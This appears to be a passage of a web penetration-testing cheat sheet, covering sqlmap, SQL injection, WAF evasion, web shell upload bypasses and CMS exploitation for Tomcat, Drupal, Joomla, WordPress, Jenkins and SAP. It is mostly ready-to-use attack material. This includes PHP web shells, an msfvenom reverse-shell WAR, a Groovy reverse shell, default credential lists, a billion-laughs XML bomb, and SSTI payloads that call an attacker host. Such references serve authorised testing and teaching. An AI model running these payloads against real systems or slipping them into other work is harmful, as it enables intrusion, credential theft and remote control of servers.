rustscan -a 0.0.0.0 -p 53,80,121,65535

# Ranges of ports
rustscan -a 0.0.0.0 --range 1-1000

# UDP scan
rustscan -a 0.0.0.0 -sU -p ports

SQLmap

sqlmap goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.

Dumping tables

Examples

Target the http://target.server.com URL using the -u flag:

sqlmap -u 'http://target.server.com'

Specify POST requests by specifying the -data flag:

sqlmap -u "http://10.10.155.76/login.php" -method "POST" -data "log_email=cun@gmail.com&log_password=123456&login_button=Login" --dbs

Target a vulnerable parameter in an authenticated session by specifying cookies using the -cookie flag:

sqlmap -u 'http://target.server.com' --cookie='JSESSIONID=09h76qoWC559GH1K7D- SQHx'

Drop all Set-Cookie requests from the target web server using the -drop-set-cookie flag:

sqlmap -u 'http://target.server.com' -r req.txt --drop-set-cookie

Perform in-depth and risky attacks using the -level and -risk flags:

sqlmap -u 'http://target.server.com' --data='param1=blah' --level=5 --risk=3

Specify which POST or GET parameter to target using the -p flag:

sqlmap -u 'http://target.server.com' --data='param1=blah&param2=blah' -p param1

Choose a random User-Agent request header using the –random-agent flag:

sqlmap -u 'http://target.server.com' -r req.txt --random-agent

Target a certain database service using the –dbms flag:

sqlmap -u 'http://target.server.com' -r req.txt --dbms Oracle

Read a request (stored via Burpsuite) target the user parameter (and no other parameters), run risky queries, and dump users and passwords:

sqlmap -r ./req.txt -p user --level=1 --risk=3 --passwords

Attempt privilege escalation on the target database

sqlmap -r ./req.txt --level=1 --risk=3 --privesc
Run the “whoami” command on the target server.
sqlmap -r ./req.txt --level=1 --risk=3 --os-cmd=whoami

Dump everything in the database, but wait one second in-between requests.

sqlmap -r ./req.txt --level=1 --risk=3 --dump --delay=1

Post-Exploit

Error-Based SQLi, dump all data from a MSSQL Database :

sqlmap -r req --technique=E -U <user> --level 5 --risk 3 --tamper=space2comment --dbms=MSSQL -D <db> --dump

Flags

Here are some useful options for your pillaging pleasure:

-r req.txt Specify a request stored in a text file, great for saved requests from BurpSuite.

--force-ssl Force SQLmap to use SSL or TLS for its requests.

--level=1 only test against the specified parameter, ignore all others.

--risk=3 Run all exploit attempts, even the dangerous ones (could damage database).

--delay Set a delay in-between requests, great for throttled connections.

--proxy Set to http://127.0.0.1:8080 to pipe requests through BurpSuite for inspection.

--privesc Attempt to elevate the privileges of the database service account.

--all Enumerate everything inside the target database.

--hostname Print the target database’s hostname.

--passwords Find and exfiltrate all users and their password hashes or digests.

--dbs Enumerate all databases accessible via the target webserver.

--comments Enumerate all found comments inside the database.

--sql-shell Return a SQL prompt for interaction.

--os-cmd Attempt to execute a system command.

--os-shell Attempt to return a command prompt or terminal for interaction.

--reg-read Read the specified Windows registry key value.

--file-write Specify a local file to be written to the target server.

--file-dest Specify the remote destination to write a file to.

--technique= Specify a letter or letters of BEUSTQ to control the exploit attempts:

B : Boolean-based blind
E : Error-based
U : Union query-based
S : Stacked queries
T : Time-based blind
Q : Inline queries

SQLi

SQL Injection (SQLi) is a type of an injection attack that makes it possible to execute malicious SQL statements. These statements control a database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures.

Payloads

Types

Error based

Forcing the database to perform some operation in which the result will be an error. Then try to extract some data from the database and show it in the error message.

Example

https://www.example.beaglesecurity.com/gallery.php?id=6'

Boolean based

Relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result.

Example

https://www.example.beaglesecurity.com/gallery.php?id=6' AND 1=1 --+

Blind based

Sending payloads, observing the web application’s response and the resulting behavior of the database server. Check payloads.

Example

https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' --

Union based

UNION-based attacks allow the tester to easily extract information from the database. Because the UNION operator can only be used if both queries have the exact same structure, the attacker must craft a SELECT statement similar to the original query.

Example

https://example.com/products.aspx?id=1' UNION SELECT passwords from users;

Time based

Forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE.

Example

https://example.com/products.aspx?id=1' and if(substring(user(),2,1)='a',SLEEP(5),1)--

SQLi to RCE

Using XAMP

Payload

# Inject cmd parameter
' union select 1,<php_payload>,3,4 into outfile <path> --
' union select 1,'<?php system($_GET["cmd"]); ?>',3,4 intooutfile 'C:\\xampp\\htdocs\\rce.php' --

# Reverse Shell created. Access from outside :
<host>/rce.php?cmd=<command>

# Test :
127.0.0.1/rce.php?cmd=time
# Result : The current time is: 16:22:25.20 Enter the new time: 3 4

ClickJacking

What is ClickJacking ?

Clickjacking, also known as a “UI redress attack”, is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the top level page.

Thus, the attacker is “hijacking” clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both.

Check

No X-Frame-Options Header
No Content Security Policy (with the frame-ancestors directive)

PoC

BurpSuite

Manual

<!-- copy in a form field -->
<iframe src="http://www.google.com" width="250" height="250"></iframe>

WAF Bypass

Brief

A WAF or web application firewall helps protect web applications by filtering and monitoring HTTP traffic between a web application and the Internet.

It typically protects web applications from attacks such as cross-site forgery, cross-site-scripting (XSS), file inclusion, and SQL injection, among others.

A WAF is a protocol layer 7 defense (in the OSI model), and is not designed to defend against all types of attacks. This method of attack mitigation is usually part of a suite of tools which together create a holistic defense against a range of attack vectors.

Identify the WAF

WAFs use standard ports : 80, 443, 8000, 8008, 8080, and 8088.

wafw00f $target

# detecting the waf
nmap -p$port --script http-waf-detect $target

# fingerprinting the waf
nmap -p$port --script http-waf-fingerprint $target

Bypass techniques

Case Toggling

Combine upper and lower case characters for creating great payloads.

Examples

# bypassed 
<ScrIpT>confirm()</sCRiPt>
sELeCt * fRoM * wHerE OWNER = 'NAME_OF_DB'

# url example
http://example.com/index.php?page_id=-1 UnIoN SeLeCT 1,2,3,4

URL Encoding

Encode normal payloads with % encoding/URL encoding.
You can use Burp. It has an encoder/decoder tool.

Examples

# blocked by waf
<Svg/x=">"/OnLoAD=confirm()//
# bypassed
%3CSvg%2Fx%3D%22%3E%22%2FOnLoAD%3Dconfirm%28%29%2F%2F

# blocked by waf
UniOn(SeLeCt 1,2,3,4,5,6,7,8,9,10)
# bypassed
UniOn%28SeLeCt+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%29

# url example
https://example.com/page.php?id=1%252f%252a*/UNION%252f%252a /SELECT

Unicode

ASCII characters in Unicode encoding give us great variants for bypassing WAF.
Encode entire or part of the payload for obtaining results.

Examples

# basic request
<marquee onstart=prompt()>

# obfuscated
<marquee onstart=\u0070r\u06f\u006dpt()>

# blocked by waf
/?redir=http://google.com

# bypassed
/?redir=http://google。com (Unicode alternative)

# blocked by waf
<marquee loop=1 onfinish=alert()>x

# bypassed
＜marquee loop＝1 onfinish＝alert︵1)>x (Unicode alternative)

# basic request
../../etc/shadow

# obfuscated
%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFshadow

HTML Representation

WebApps encode special characters into HTML. Encoding and render them accordingly.
Basic bypass cases with HTML encoding numeric and generic.

Examples

# basic request
"><img src=x onerror=confirm()>

# encoded payload
&quot;&gt;&lt;img src=x onerror=confirm&lpar;&rpar;&gt; 
# or
&#34;&#62;&#60;img src=x onerror=confirm&#40;&#41;&#62;

Mixed Encoding

Such rules often tend to filter out a specific type of encoding.
Such filters can be bypassed by mixed encoding payloads.
Newlines and tabs and further add to obfuscation.

Examples

# obfuscated payload
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

Using comments

Comments obfuscate standard payload vectors.
Different payloads have different ways of obfuscation.

Examples

# blocked by waf
<script>confirm()</script>

# bypassed
<!--><script>confirm/**/()/**/</script>

# blocked by waf
/?id=1+union+select+1,2--

# bypassed
/?id=1+un/**/ion+sel/**/ect+1,2--

# url example
index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4'union%a0select pass from users#

index.php?page_id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3

Double Encoding

Web Application Firewall filters tend to encode characters to protect web app.
Poorly developed filters (without recursion filters) can be bypassed with double encoding.

# basic request
http://example/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\

# obfuscated payload
http://example/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\

# basic payload
<script>confirm()</script>

# obfuscated payload
%253Cscript%253Econfirm()%253C%252Fscript%253E

Wildcard Obfuscation

Global patterns are used by various command-line utilities to work with multiple files.
We can change them to run system commands.

Examples

# basic request
/bin/cat /etc/passwd

# obfuscated payload
/???/??t /???/??ss??

# used chars
/ ? t s

# basic request
/bin/nc 127.0.0.1 443

# obfuscated payload
/???/n? 2130706433 443

# used chars
/ ? n [0-9]

Junk Characters

Simple payloads get filtered out easily by WAF.
Adding some junk chars helps avoid detection (only specific cases ).
This technique often helps in confusing regex-based firewalls.

Examples

# basic request
<script>confirm()</script>

# obfuscated payload
<script>+-+-1-+-+confirm()</script>

# basic request
<BODY onload=confirm()>

# obfuscated payload
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>

# basic request
<a href=javascript;alert()>ClickMe

# bypassed technique
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

File Upload Bypass

Web shell Upload via Content-Type restriction Bypass

When uploading a .php file;

# Change :
# Content-Type: application/x-php
# to
# Content-Type: image/jpeg
# Content-Type: image/png

Web shell upload via path traversal

When uploading a php file; You can upload the file to a different directory with lesser controls (a different directory that's not supposed to contain user-supplied files)

# Change :
# Content-Disposition: form-data; name="avatar"; filename="secrets.php"
# to
# Content-Disposition: form-data; name="avatar"; filename="../secrets.php"

# You can encode "../" as :
    %2e%2e%2f
    %252e%252e%252f
    ..%c0%af
    ..%ef%bc%8f
# Then access the file with LFI :
# GET /files/avatars/../secrets.php

Overriding the server configuration

Before uploading a php file;

Servers also allow developers to create special configuration files within individual directories in order to override or add to one or more of the global settings.
Apache servers, for example, will load a directory-specific configuration from a file called .htaccess if one is present.

# First, upload a malicious .htaccess :
# Content-Disposition: form-data; name="avatar"; filename=".htaccess"
# Content-Type: text/plain

# AddType application/x-httpd-php .l33t

# Then upload the php file with .l33t extention
# Content-Disposition: form-data; name="avatar"; filename="secrets.l33t"
# Content-Type: application/x-php

<?php echo file_get_contents('/home/carlos/secret'); ?>
# or
<?php system($_GET['cmd']); ?>

Web Shell Upload Bypasses Techniques List

According to OWASP the following list can be used by penetration testers in order to bypass a variety of protections :

Try using the URL encoding (or double URL encoding) for dots, forward slashes, and backward slashes. If the value isn't decoded when validating the file extension, but is later decoded server-side, this can also allow you to upload malicious files that would otherwise be blocked: exploit%2Ephp
Try using multibyte unicode characters, which may be converted to null bytes and dots after unicode conversion or normalization. Sequences like xC0 x2E, xC4 xAE or xC0 xAE may be translated to x2E if the filename parsed as a UTF-8 string, but then converted to ASCII characters before being used in a path.
Content-Type —> Change the parameter in the request header using Burp, ZAP etc.
Put server executable extensions : .php5, .shtml, .asa, .cert
Changing letters to capital form : .aSp, .PHp3
Using trailing spaces and/or dots at the end of the filename like .asp.. . .... ... , .asp , .asp.
Use of semicolon after the forbidden extension and before the permitted extension : .asp;.jpg (Only in IIS 6 or prior)
Upload a file with 2 extensions —> file.php.jpg
Use of null character—> file.asp%00.jpg
Create a file with a forbidden extension —> file.asp:.jpg or file.asp::$data
ALSO : Combination of the above

Remote Code Execution via Polyglot web shell upload

In order to upload a php file where the file verification is done on the server side (checking if it is really a IMAGE file), we can disguise a php file as an image file.

When uploading a php file :

# You can add :
GIF89a; // at the beginning of the php file or in the burp request

# Burp request
# Content-Disposition: form-data; name="avatar"; filename="secrets.php"
# Content-Type: application/x-php

# GIF89a at the beginning of the php command
GIF89a;<?php echo file_get_contents('/home/carlos/secret'); ?>
# OR
GIF89a;<?php system($_GET['cmd']); ?>

or, Generate a polyglot payload using exiftool :

# example 1
exiftool -Comment="<?php echo 'START ' . 
file_get_contents('/home/carlos/secret') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php

# example 2
exiftool -Comment="<?php echo 'START ' . 
system($_GET['cmd']); . ' END'; ?>" $input.jpg -o polyglot.php

upload_bypass

File upload restrictions bypass by using different bug bounty techniques! Tool must be running with all its assets!

Install

git clone https://github.com/sAjibuu/upload_bypass.git
cd upload_bypass/
pip3 install -r requirements.txt

python3 ext_bypass.py -u $url -e $extension-file -a $allowed-extension -s $success-msg --location $path-of-uploaded-file

PoC

Oracle APEX

Basics

Oracle APEX (Application Express) is a low-code development platform that enables users to build, design, and deploy scalable and secure web applications using a web browser. It is fully integrated with the Oracle Database, making it easy to create data-driven applications quickly. APEX is particularly popular for its ease of use and the ability to create sophisticated applications with minimal coding.

Oracle APEX is based on PL/SQL (Procedural Language/Structured Query Language), which is Oracle's procedural extension for SQL. The platform also uses other web technologies like HTML, CSS, and JavaScript for the user interface and client-side functionality.

As for security, Oracle APEX is generally considered secure as it has built-in security features to protect applications from common vulnerabilities, such as SQL injection and cross-site scripting (XSS). Oracle continuously updates and enhances the platform's security measures to keep up with new threats. However, the security of an APEX application also depends on the developers' practices, like proper input validation, access control implementation, and keeping the platform up-to-date with the latest security patches.

APEX URL Synthax

APEX URL that refers to Page 1 of Application 100 : http://localhost/apex/f?p=100:1:12432087235079

Interesting endpoints

Info Leak

Source code :

JS files :

META :

Testing Authorization and Authentification

Check the login process for weaknesses, such as :

Insecure transmission of login data,
Weak password requirements,
Susceptibility to brute force attacks (is there any account lockout ?),
Try to access resources without proper authorization to see if the application correctly restricts access.

Testing IDOR

Burp Intruder

https://my.app.com/apex/f?p=x:y:SESSION:::::ITEM:ITEM_VALUE

x = application ID y = page ID

Capture a request in the proxy and send it to the Intruder tool. Set your payload position on the pageID parameter
Under Payloads, choose the “Numbers” payload and set an appropriate range you’d like to test.
Run

Testing SQLi

sqlmap

See slide n°24 for more infos

Rewrite with wwv_flow.show :

php://input
C:\boot.ini
C:\WINDOWS\win.ini
C:\WINDOWS\php.ini
C:\WINDOWS\System32\Config\SAM
C:\WINNT\php.ini
C:\xampp\phpMyAdmin\config.inc
C:\xampp\phpMyAdmin\phpinfo.php
C:\xampp\phpmyadmin\config.inc
C:\xampp\phpmyadmin\phpinfo.php
C:\xampp\phpmyadmin\config.inc.php
C:\xampp\phpMyAdmin\config.inc.php
C:\xampp\apache\conf\httpd.conf
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\mercury.ini
C:\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\phpMyAdmin\config.inc.php
C:\xampp\tomcat\conf\tomcat-users.xml
C:\xampp\tomcat\conf\web.xml
C:\xampp\sendmail\sendmail.ini
C:\xampp\webalizer\webalizer.conf
C:\xampp\webdav\webdav.txt
C:\xampp\apache\logs\error.log
C:\xampp\apache\logs\access.log
C:\xampp\FileZillaFTP\Logs
C:\xampp\FileZillaFTP\Logs\error.log
C:\xampp\FileZillaFTP\Logs\access.log
C:\xampp\MercuryMail\LOGS\error.log
C:\xampp\MercuryMail\LOGS\access.log
C:\xampp\mysql\data\mysql.err
C:\xampp\sendmail\sendmail.log
C:\apache\log\error.log
C:\apache\log\access.log
C:\apache\log\error_log
C:\apache\log\access_log
C:\apache2\log\error.log
C:\apache2\log\access.log
C:\apache2\log\error_log
C:\apache2\log\access_log
C:\log\error.log
C:\log\access.log
C:\log\error_log
C:\log\access_log
C:\apache\logs\error.log
C:\apache\logs\access.log
C:\apache\logs\error_log
C:\apache\logs\access_log
C:\apache2\logs\error.log
C:\apache2\logs\access.log
C:\apache2\logs\error_log
C:\apache2\logs\access_log
C:\logs\error.log
C:\logs\access.log
C:\logs\error_log
C:\logs\access_log
C:\log\httpd\access_log
C:\log\httpd\error_log
C:\logs\httpd\access_log
C:\logs\httpd\error_log
C:\opt\xampp\logs\access_log
C:\opt\xampp\logs\error_log
C:\opt\xampp\logs\access.log
C:\opt\xampp\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\xampp\apache\conf\httpd.conf

<!--?xml version="1.0" ?-->
<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<tag>&lol9;</tag>

# admin interfaces
/apex/apex_admin
/i/apex_admin
/pls/apex/apex_admin
/ords/<workspace_name>/builder
# dev URL
/apex/wwv_flow.show?P_FLOW_ID=APP_ID
# web service
/apex/APP_ALIAS/wwv_flow.ajax
/apex/APP_ALIAS/wwv_flow.file_upload
/apex/APP_ALIAS/wwv_flow.accept
# misc
/apex/f?p=13000:1 # Packaged applications
/apex/f?p=4700 # Application Builder
/apex/f?p=4000:4500 # Team Development
/apex/f?p=4350 # SQL Workshop
/apex/f?p=4950 # Administration Services

Apache

Server Status

Apache server-status is an Apache monitoring instance Available by default at http://$target/server-status

In normal cases, the server-status instance is not accessible by non-local IPs. However, due to misconfiguration, it can be publicly accessible. This leads anyone to view the great amount of data by server-status.

Data exposed

All URL requested by all hosts/vhosts, including obscure files/directories and session tokens
All requested client's IPs

Exploiting it

# install
git clone https://github.com/mazen160/server-status_PWN.git
cd server-status_PWN
pip3 install -r requirements

# exploit
python3 server-status_PWN.py --url 'http://$target/server-status'

CVE-2021-41773

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49-2.4.50.

An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts.

This issue only affects Apache 2.4.49 & 2.4.50 and not earlier versions.

# install
git clone https://github.com/iilegacyyii/PoC-CVE-2021-41773.git
cd PoC-CVE-2021-41773/
python3 CVE-2021-41773.py --host https://$target

Tomcat

No Account

Default Credentials

admin:
admin:admin
admin:password
admin:password1
admin:Password1
admin:tomcat
manager:manager
root:changethis
root:password
root:password1
root:root
root:r00t
root:toor
tomcat:(empty)
tomcat:admin
tomcat:changethis
tomcat:password
tomcat:password1
tomcat:s3cret
tomcat:tomcat

Bruteforce

# metasploit
msf> use auxiliary/scanner/http/tomcat_mgr_login

# hydra
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html

Passwords Backtrace disclosure

/auth.jsp

With Account

Manager - RCE

You will only be able to deploy a WAR if you have enough privileges (roles: admin, manager and manager-script).
Those details can be find under tomcat-users.xml usually defined in /usr/share/tomcat9/etc/tomcat-users.xml (it vary between versions)

PoC

# metasploit
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

# msfvenom - manually
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=8083 -f war -o revshell.war
# upload it to tomcat and access it : /revshell/
curl --upload-file shell.war -u 'tomcat:password' "https://example.com/manager/text/deploy?path=/shell"

# host
nc -lvnp 8083

Servers / CMS

CMSMap

CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs. The main purpose of CMSmap is to integrate common vulnerabilities for different types of CMSs in a single tool.

At the moment, CMSs supported by CMSmap are WordPress, Joomla, Drupal and Moodle.

git clone https://github.com/Dionach/CMSmap
cd CMSmap/
pip3 install .

cmsmap $url

Drupal

Manual

# check meta
curl https://www.drupal.org/ | grep 'content="Drupal'
# version
curl https://drupal-site.com/CHANGELOG.txt
# node
curl drupal-site.com/node/1

# users
# 403 -> exists | 404 -> doesn"t
curl https://www.drupal.org/user/X
# get username
curl https://www.drupal.org/reset/user/X/1/1

Exploits

Drupal < 8.7.x Authenticated RCE module upload

Drupal < 9.1.x Authenticated RCE Twig templates

"Administer views" -> new View of User Fields -> Add a "Custom text" :

"{{ {"#lazy_builder": ["shell_exec", ["touch /tmp/hellofromviews"]]} }}"

If found /node/$NUMBER, the number could be devs or tests pages

Drupal < 8.6.9 - REST Module Remote Code Execution

Check for username disclosure on old versions:

?q=admin/views/ajax/autocomplete/user/a

Tools

Drupwn

Enumeration & Exploitation

# install
git clone https://github.com/immunIT/drupwn.git
cd drupwn
pip3 install -r requirements.txt

# enum
drupwn --mode enum --target $url

# exploit
drupwn --mode exploit --target $url

droopescan

apt-get install python-pip
pip install droopescan

# scan
 droopescan scan drupal -u example.org

Wordpress eBook Download < 1.2 - CVE-2016-10924

Brief

There is a directory traversal vulnerability in Wordpress eBook Download < 1.2, which allow remote attackers to read arbitrary files.

PoC

Manual

curl http://$target/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../etc/passwd

Script

git clone https://github.com/rvizx/CVE-2016-10924
cd CVE-2016-10924
python pidbrute.py $url

WordPress

Manual

Information Gathering

license.txt (wordpress version)
wp-activate.php
wp-content/uploads/
wp-includes/
wp-config.php

# get wordpress version
curl https://victim.com/ | grep 'content="WordPress'

Users / IP

Check for usernames : /wp-json/wp/v2/users

Could leak IP addresses : /wp-json/wp/v2/pages

# get author name = potential user
curl -s -I -X GET http://blog.example.com/?author=1

xmlrpc.php

Active

Credentials brute-force or use it to launch DoS attacks

Exploit

SSRF

/wp-json/oembed/1.0/proxy

Try

https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net

WPScan

WPScan WordPress security scanner. Written for security professionals and blog maintainers to test the security of their WordPress websites.

Commands - with API

Default

# Enumerate all plugins with known vulnerabilities
wpscan --url $target -e vp --plugins-detection mixed --api-token $YOUR_TOKEN

# Enumerate all plugins in WPSCAN database (could take a very long time)
wpscan --url $target -e ap --plugins-detection mixed --api-token $YOUR_TOKEN

Private Commands - with API

# Deeper scan
wpscan --url $target --ignore-main-redirect --detection-mode aggressive --plugins-detection mixed --api-token $YOUR_TOKEN

Jenkins

Enumeration

msf> use auxiliary/scanner/http/jenkins_enum

# execute commands without authentication ?
msf> use auxiliary/scanner/http/jenkins_command

# get jenkins version
/oops
/error

RCE from Script Console

revsh.groovy

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Resources

Joomla!

Reconnaissance

Endpoints | Manual

/robots.txt
/README.txt
/LICENSE.txt
/administrator/manifests/files/joomla.xml
/language/en-GB/en-GB.xml
/plugins/system/cache/cache.xml
/web.config

Automatic

# droopescan
droopescan scan joomla --url http://joomla-site.local/

# joomscan - OWASP 
git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl

Exploit

Bruteforce

Default credentials :
admin:admin

wget https://raw.githubusercontent.com/ajnik/joomla-bruteforce/master/joomla-brute.py
python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

CVE-2023-23752 to Code Execution

curl -v http://10.9.49.205/api/index.php/v1/config/application?public=true
# Joomla! MySQL credentials plain-text
# Modify a template when logged in
# Site templates > Editor > modify 'error.php' :
system($_GET['cmd']);

# try : 
curl -s http://joomla-site.local/templates/cassiopeia/error.php\?cmd\=id

Server-Side Request Forgery

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems, potentially leaking sensitive data such as authorization credentials.

Exploitation

Against the server itself

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1

# change to :

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://localhost/admin

Here, the server will fetch the contents of the /admin URL and return it to the user.

Against other back-end systems

Another type of trust relationship that often arises with server-side request forgery is where the application server is able to interact with other back-end systems that are not directly reachable by users.

In the preceding example, suppose there is an administrative interface at the back-end URL https://192.168.0.68/admin. Here, an attacker can exploit the SSRF vulnerability to access the administrative interface by submitting the following request:

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://192.168.0.68/admin

Bypass Defenses

Blacklist-based input filters

Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent the filter using various techniques:

Using an alternative IP representation of 127.0.0.1, such as 2130706433, 017700000001, or 127.1.
Registering your own domain name that resolves to 127.0.0.1. You can use spoofed.burpcollaborator.net for this purpose.
Obfuscating blocked strings using URL encoding or case variation.

Whitelist-based input filters

Some applications only allow input that matches, begins with, or contains, a whitelist of permitted values. In this situation, you can sometimes circumvent the filter by exploiting inconsistencies in URL parsing.

The URL specification contains a number of features that are liable to be overlooked when implementing ad hoc parsing and validation of URLs:

You can embed credentials in a URL before the hostname, using the @ character. For example:
- https://expected-host@evil-host
You can use the # character to indicate a URL fragment. For example:
- https://evil-host#expected-host
You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example:
- https://expected-host.evil-host
You can URL-encode characters to confuse the URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.
You can use combinations of these techniques together.

SAP

Discovery

wfuzz -w /usr/share/SecLists/Discovery/Web-Content/URLs/urls-SAP.txt --hc 404,403,503,406,401 --hl 172 https://domain.com/FUZZ
wfuzz -w /usr/share/SecLists/Discovery/Web-Content/CMS/SAP.fuzz.txt --hc 404,403,503,406,401 --hl 172 https://domain.com/FUZZ
wfuzz -w /usr/share/SecLists/Discovery/Web-Content/sap.txt --hc 404,403,503,406,401 --hl 172 https://domain.com/FUZZ

# good wordlist
wget https://gist.githubusercontent.com/0x240x23elu/88327494cf7331008a13bc7d5aabfe74/raw/62bed611cfef054ffbb9b8bd0a320a53671d9ee4/SAPwordlists.txt -o sap_great.txt
wfuzz -w sap_great.txt --hc 404,403,503,406,401 --hl 172 https://domain.com/FUZZ

# check juicy
http://domain.com/sap/public/info

Default Passwords

USER

PASSWORD

CLIENT

SAP*

06071992, PASS

001, 066, Custom

DDIC

19920706

000, 001, Custom

TMSADM

PASSWORD, $1Pawd2&

000

SAPCPIC

ADMIN

000,001

EARLYWATCH

SUPPORT

066

Exploits

SAP_RECON (CVE-2020-6287, CVE-2020-6286)

This script allows to check SAP LM Configuration Wizard missing authorization check vulnerability and as a PoC script exploits directory traversal in queryProtocol method.
Directory traversal allows to download any zip from SAP server.

# install
git clone https://github.com/chipik/SAP_RECON.git 
cd SAP_RECON/

# usage
python RECON.py -h

Server-Side Template Injection

Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.

At the severe end of the scale, an attacker can potentially achieve remote code execution, taking full control of the back-end server and using it to perform other attacks on internal infrastructure.

Even in cases where full remote code execution is not possible, an attacker can often still use server-side template injection as the basis for numerous other attacks, potentially gaining read access to sensitive data and arbitrary files on the server.

Identification

Payloads

-------------------------------------------------------------------
Polyglot:
${{<%[%'"}}%\

-------------------------------------------------------------------
FreeMarker (Java):
${7*7} = 49
<#assign command="freemarker.template.utility.Execute"?new()> ${ command("cat /etc/passwd") }
--------------------------------------------------------------------
(Java):
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
${T(java.lang.System).getenv()}
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(" ")}
--------------------------------------------------------------------
Twig (PHP):
{{7*7}}
{{7*'7'}}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
--------------------------------------------------------------------
Smarty (PHP):
{$smarty.version}
{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
-------------------------------------------------------------------
